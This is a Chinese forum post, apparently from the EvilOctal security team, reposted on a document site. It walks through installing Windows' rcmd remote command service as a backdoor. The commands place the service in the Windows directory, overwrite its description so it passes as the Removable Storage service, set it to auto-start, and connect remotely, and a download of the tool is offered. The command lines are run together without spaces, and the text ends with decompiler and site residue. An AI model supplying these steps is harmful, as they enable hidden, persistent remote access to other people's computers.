搜档网
当前位置:搜档网 › windows自带的rcmd后门使用方法整理

windows自带的rcmd后门使用方法整理

[原创]windows自带的rcmd后门使用方法整理
文章标题:[原创]windows自带的rcmd后门使用方法整理顶部 pt007 发布于:2007-03-1613:30 [楼主][原创]windows自带的rcmd后门使用方法整理
文章作者:pt007[at]https://www.sodocs.net/doc/a64755984.html,
信息来源:邪恶八进制信息安全团队(https://www.sodocs.net/doc/a64755984.html,)

注意:本软件版权归作者pt007所有,转载请注明。

1、rcmdsvc/install//安装后的服务名为:RemoteCommandService(rcmdsvc),建议上传至windows目录
怎么用命令行改服务名和描述:
sc\\127.0.0.1queryrcmdsvc//查询整个服务
sc\\127.0.0.1qdescriptionrcmdsvc//查询服务的描述
sc\\127.0.0.1descriptionrcmdsvc"管理和编录可移动媒
体并操作自动化可移动媒体设备。如果这个服务被停止,依赖可移动存储的程序,如备份和
远程存储将放慢速度。如果禁用这个服务,所有专依赖这个服务的服务将无法启动。" //修改服务的描述
D:\pt007\f\Pstools2.11>psservice\\127.0.0.1setconfigrcmdsvcauto//设置服务为自动启动
2、netstartrcmdsvc
3、rcmd\\127.0.0.1ver


[此贴被EvilOctal在2007-03-1705:40重新编辑]
附件:windows自带的rcmd后门.rar(21K)下载次数:81(c)Copyleft2003-2007,EvilOctalSecurityTeam.
ThisfileisdecompiledbyanunregisteredversionofChmDecompiler.
Regsiteredversiondoesnotshowthismessage.
YoucandownloadChmDecompilerat:https://www.sodocs.net/doc/a64755984.html,/


相关主题